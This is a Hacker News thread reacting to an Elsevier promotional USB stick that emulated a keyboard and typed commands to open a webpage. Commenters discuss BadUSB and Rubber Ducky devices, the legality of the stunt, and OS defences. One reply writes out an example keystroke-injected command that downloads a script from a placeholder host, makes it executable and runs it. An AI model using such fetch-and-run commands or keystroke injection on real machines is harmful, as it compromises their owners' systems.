
Elsevier, that just freaked me out - phreeza
http://swaldman.dreamwidth.org/352778.html
======
adrianN
Plugging things in your USB port has been known as a dangerous activity for
quite some time.[1,2] It's surprising that someone at Elsevier thought it
would be a good idea to use these techniques though.

[1] [https://srlabs.de/badusb](https://srlabs.de/badusb)

[2] [https://media.blackhat.com/bh-
dc-11/Larimer/BlackHat_DC_2011...](https://media.blackhat.com/bh-
dc-11/Larimer/BlackHat_DC_2011_Larimer_Vulnerabiliters_w-removeable_storage-
wp.pdf)

~~~
mbreese
Is it _really_ all that surprising that someone from Elsevier thought it was a
good idea?

~~~
Animats
This is a known attack vector. For a major company to use it is probably
criminal, under the Computer Fraud and Abuse Act. There's no sign of an EULA
here, authorizing them access.

Elsevier knows this is an attack. They published a book titled "Seven
Deadliest USB Attacks", by Brian Anderson. So they can't claim this wasn't
done knowingly.

Has anybody found out what the attack does?

[1] [http://www.elsevier.com/books/seven-deadliest-usb-
attacks/an...](http://www.elsevier.com/books/seven-deadliest-usb-
attacks/anderson/978-1-59749-553-0)

~~~
klausa
"Making a thing type stuff when you plug it in" is an attack vector in the
same way "sending a request over the network" is.

~~~
tripzilch
Well it's not "just typing stuff", it's typing some rather specific stuff to
make your computer do something quite unexpected. The reasonable expectation
(for a promotional item) is that it's a memory stick, not that it suddenly
starts typing system control global keyboard shortcuts into your computer.

Say you'd post a persistent XSS to a forum, but only use it include
Fartscroll.js, is that an attack or not? Cause I consider that to be pretty
much the same category as the "surprise" automatic typing USB thing.

This weekend actually I used a USB device where this was in fact the
_intended_ behaviour: a barcode scanner. It registers as a keyboard and just
types the numbers (or string) of whatever it scans. Very clever idea because
it makes it very easy to write apps for, you don't need a driver or anything.
Except I had momentarily forgotten that was how it works, so it surprised me
anyway. Fortunately the numbers didn't do much in the program I had focused
but still, that feeling of _something else_ unexpectedly typing on my
computer! Yeah if it had sent global keyboard shortcuts in order to make my
computer start applications and load webpages, I'd be pretty pissed.

------
jordigh
Can we have a usb condom for this situation? The actual product called "usb
condom" is about charging phones and blocking all data pins on the usb drive.
Can we have one that will only allow devices to connect as mass storage
devices, or is this at odds with the usb protocol?

~~~
gchadwick
I wonder if you actually need a hardware device for this?

Seems you could have an OS feature so when you insert a USB device it first
confirms you're happy for the device to register as an X (mass storage, input,
audio etc) before it lets it do it.

~~~
gchadwick
Though saying yes to registering your keyboard, mouse etc every time you boot
might get a little tedious (not to mention impossible if you have no other
input devices!).

Perhaps an extension to USB that has 512-bits worth of persistent storage per
device. When you register a device the OS produces a random number and writes
it and saves the list of allowed IDs.

Or perhaps you could ask the OS to only apply the ask to register feature to
certain USB ports?

~~~
zxv
USB firewall.

White-list the USB keyboard when it is first attached, using its unique serial
number, and avoid a prompt in the future.

~~~
dfox
Various devices tend to either have serial number empty (for example both my
keyboard and mouse, Sun and Logitech respectively, so not exactly cheap
Chinese crap) or filled with some random garbage that is not unique at all
("123456", "Serial" and so on).

One would assume that "garbage in iSerial" is workaround for Windows' behavior
of identifying devices by either it's serial or physical port and requiring
distinct driver registrations for devices that are "different" according to
this logic.

~~~
the8472
it might still be useful to filter based on type. if you expect a mass storage
device you don't want it to register as input device.

------
jimrandomh
This is an operating system problem. When a new device is plugged in and
claims to be a keyboard, it should lock the screen and not be accepted as
input until it has typed the user's login password.

~~~
cheepin
This instantly breaks Yubikey among other things.

~~~
freehunter
A lot of security fixes break features that would otherwise be classified as
exploits.

------
brillenfux
So will this USB firmware situation eventually be solved in some newer version
or are we all just silently ignoring this?

Because this makes USB an absolute NO in some environments (and for quite a
while now).

It would be nice if we could use USB again at some point…

~~~
throwaway7767
> So will this USB firmware situation eventually be solved in some newer
> version or are we all just silently ignoring this?

No, it will not be fixed. There is no vulnerability. We need to plug in
keyboards, and if users are willing to plug random devices into the ports
where their keyboards lie, those peripherals can inject keystrokes.

We can play whack-a-mole and blacklist the vendor/product IDs (like systemd
does), but if this were a real attack and not a stupid marketing stunt, the
device would just present itself as some popular cheap keyboard and there'd be
no way for the computer to tell it apart from one.

There are many other ways you could attack USB or other connectors if you get
a user to plug your hardware in there, most are more involved than this one.
The only solution is to educate people to not plug hardware they don't trust
into their machines.

~~~
digi_owl
That systemd thing is hilarious in its tragic misunderstanding.

Basically a patch was offered that would lock a computer if a new device was
plugged in. This to counter act police mouse wigglers etc.

But Poettering decided that no that was too heavy handed, lets instead black
list the specific product id. Never mind that changing a product id is a
firmware flash away (one could probably make a wiggler that randomize its id
on each insertion).

~~~
vacri
It is too heavy-handed. Locking the computer every time I plug in a controller
or some other HID?

What if the battery dies in my wireless keyboard, and I need to plug in
another one temporarily? How could I possibly type in the password at a lock
screen with one dead keyboard and all new keyboards forbidden?

~~~
Dylan16807
With your mouse.

I'm being cheeky but any good lock screen should have an onscreen keyboard
button.

And it should only need to do it the first time you plug it in.

~~~
vacri
Not all lockscreens do. Using MATE on this machine, no such button. I don't
believe the KDE 4.4 one does either. The greeter might, but not the
lockscreen.

------
jimrandomh
Distributing a USB device that pretends to be a keyboard and types commands is
somewhere between faux pas and criminal hacking attempt. Even if the intent
was innocent, it has to be investigated like a breakin to be sure. In this
case it sounds like it was closer to the faux pas side.

~~~
zdkl
What bothers me in these situations where there is (arguably) room for
interpretation over the gravity of the act is the double standards. BigCompany
does something harmless but illegal? They have the resources to make it sound
completely benign to a court. Some random person gets hauled to court over an
arguably harmless/moral grey zone matter and the story ends much differently.

~~~
1024core
I was going to say that. Reminds me of Sony's RootKit. Did any Sony exec get
prosecuted for "hacking"? Nope.

------
upofadown
I suspect that a legal approach might work here. Elsevier was being
deliberately misleading and was deliberately making a computer do something
that the owner of that computer had not authorized. There must be some
computer crime statute they could be charged under.

~~~
pbhjpbhj
On a naive reading it breaches the Computer Misuse Act in the UK and the CFAA
in the USA both of which have terms guarding against unauthorised access. You
need more wrangling to read it in to a normal interpretation of the CFAA
however.

IANAL.

------
jgrahamc
I made a thing like this for the office with an Arduino Trinket:
[https://github.com/jgrahamc/missile_command](https://github.com/jgrahamc/missile_command)

------
ColinWright
[https://news.ycombinator.com/item?id=10203010](https://news.ycombinator.com/item?id=10203010)

~~~
phreeza
Huh, how did that get past the dupe detector? It's exactly the same URL.

~~~
sctb
The dupe detector now takes into account the amount of attention previous
submissions received.

~~~
skrebbel
Might be nice if it could bump a post back to "new" when the dupe detector
finds a dupe with not-very-much-attention - that way, effectively the comments
are merged.

------
sp332
I wonder if it's hard-coded or if you could make it do something else. Hak5
has been selling programmable versions of these for a while.
[http://hakshop.myshopify.com/collections/usb-rubber-
ducky/pr...](http://hakshop.myshopify.com/collections/usb-rubber-
ducky/products/usb-rubber-ducky-deluxe?variant=353378649)

~~~
olympus
This is common in the pentesting world. If you can get physical access to a
USB port for just a few seconds you can enter the keystrokes to open up a port
(or reverse SSH) to the outside world. With only three different procedures
(one for Windows, Mac, and Linux) you can own 99% of the computers in the
world.

------
ozzmotik
not sure if this has been mentioned, but this sounds like the Rubber Ducky

[http://hakshop.myshopify.com/products/usb-rubber-ducky-
delux...](http://hakshop.myshopify.com/products/usb-rubber-ducky-
deluxe?variant=353378649)

just contributing something of interest.

~~~
samwiseg
Yeah exactly, this has been out for a while. Not sure why this is on the front
page of HN.

~~~
sprkyco
Most likely due to the fact that a publishing company was utilizing this
"hack".

------
almightysmudge
Stuns me that someone thought this would be a good idea.

Oh hey my free USB device helpfully made me go to a webpage without warning
and without permission, these guys are wizards and deserve my custom.

~~~
deong
Well, it's Elsevier. The fact that it only _potentially_ exploited your system
and didn't attempt to grab your banking password might actually be taken as a
legitimate sign of improvement.

------
px43
Ancient. The latest fun project enabling this sort of thing is Samy's
USBDriveby project:

[https://www.youtube.com/watch?v=aSLEq7-hlmo](https://www.youtube.com/watch?v=aSLEq7-hlmo)

And yes, you totally can detect operating system, bypass HID protections, and
deliver custom weaponized payloads in the form of scripts catted into the
command prompt.

------
Someone
Anybody know whether [https://www.gdatasoftware.com/en-usb-keyboard-
guard](https://www.gdatasoftware.com/en-usb-keyboard-guard) works well and can
be trusted?

------
j_s
What is the url?

Seems like a juicy target for a hack on the server side.

------
kazagistar
My employer blocks USB memory sticks... but still permits keyboards and mice
for convenience. I am not sure what they hope to accomplish.

~~~
px43
They hope to prevent people from putting sensitive documents on unencrypted
media that's easy to lose.

There have been worms that spread through autorun and shell exploits, but I
think that's a secondary concern.

~~~
kazagistar
... except I don't have access to sensitive information (because we have a
decent separation between programmers and ops related to PII), and I do have
full access to the entire internet, which is a great alternate insecure
transfer medium.

------
hnk
A friend of mine works at an univeristy in Germany and one of his last
projects was exactly this.

They were to build a device using a teensy that starts up a webpage once
plugged in. It needed to work on major OSes and *nix systems. Win7/8/10, OSX,
Ubuntu.

This was for some conference as well where they were to be used...

------
moyix
Apparently some of these are reprogrammable by just rewriting the onboard I2C
EEPROM:

[http://blog.opensecurityresearch.com/2012/10/hacking-usb-
web...](http://blog.opensecurityresearch.com/2012/10/hacking-usb-webkeys.html)

Could be a fun weekend project.

------
SomeoneWeird
There's an off-the-shelf USB that you can buy called a Teensy[1] that is
programmable and automatically registers itself as a USB HID. Very similar to
what is described here.

[1] [https://www.pjrc.com/teensy/](https://www.pjrc.com/teensy/)

------
jonknee
And that's a feature, not a bug. I have a YubiKey and it does a similar thing,
but for good not evil. It would be tricky for an OS to not register keyboards
(after all, how would you vouch for an input device without using an input
device?).

tl;dr don't plug unknown things into your computer.

~~~
masklinn
> after all, how would you vouch for an input device without using an input
> device?

Separate built-in device, or specific signal sequence inputtable on the IME
the device registered itself as e.g. if you plug in something which advertises
itself as a keyboard, the system sandboxes it and asks that you input a
specific password which it displays; for a pointing device it might ask you to
move the pointer to specific places and click on them.

~~~
zyxley
I like this. It feels pretty similar to the "enter this random set of numbers"
method for some Bluetooth keyboard pairings.

------
ggchappell
I don't worry much about inserting wacky storage devices, as I run Linux, and
I don't have any kind of auto-run enabled.

But this would still work on my machine, right? (I mean that the key combo
would be entered; it might not actually bring up the web page, depending on my
setup.)

~~~
phaemon
Yes, and worse it could do something like:

ALT+F2 wget [http://example.com/badscript.sh](http://example.com/badscript.sh)
&& chmod 755 ~/badscript.sh && ~/badscript.sh &

Which is not so good...

~~~
jessaustin
Oh it would _suck_ to have to put a shorter timeout on _sudo_.

------
robryk
I wonder if it is possible to fingerprint USB keyboards of same make (with
same dummy serial number) to tell them apart. For example one could try to
exploit frequency deviations of the crystal oscillator in the keyboard.

------
rblatz
Hyundai did this years ago in 2011 when I bought my car. They sent me a USB
key that emulated a keyboard. It opened up the Hyundai registration page, and
may have typed my VIN in for me. This isn't new at all.

------
s_kilk
A few years back a colleague (at the time) went to a MongoDB event where they
pulled this same stunt, handing out usb drives that would act like a keyboard
and hijack the machine.

Both clever and reprehensible.

------
javajosh
It's not an attack unless you write to the hard-drive. This is more of a
nuisance, and a bad move, and troubling for what it _could_ be, but the thing
itself looks harmless.

------
conceit
is this done to boost the called site's search rank?

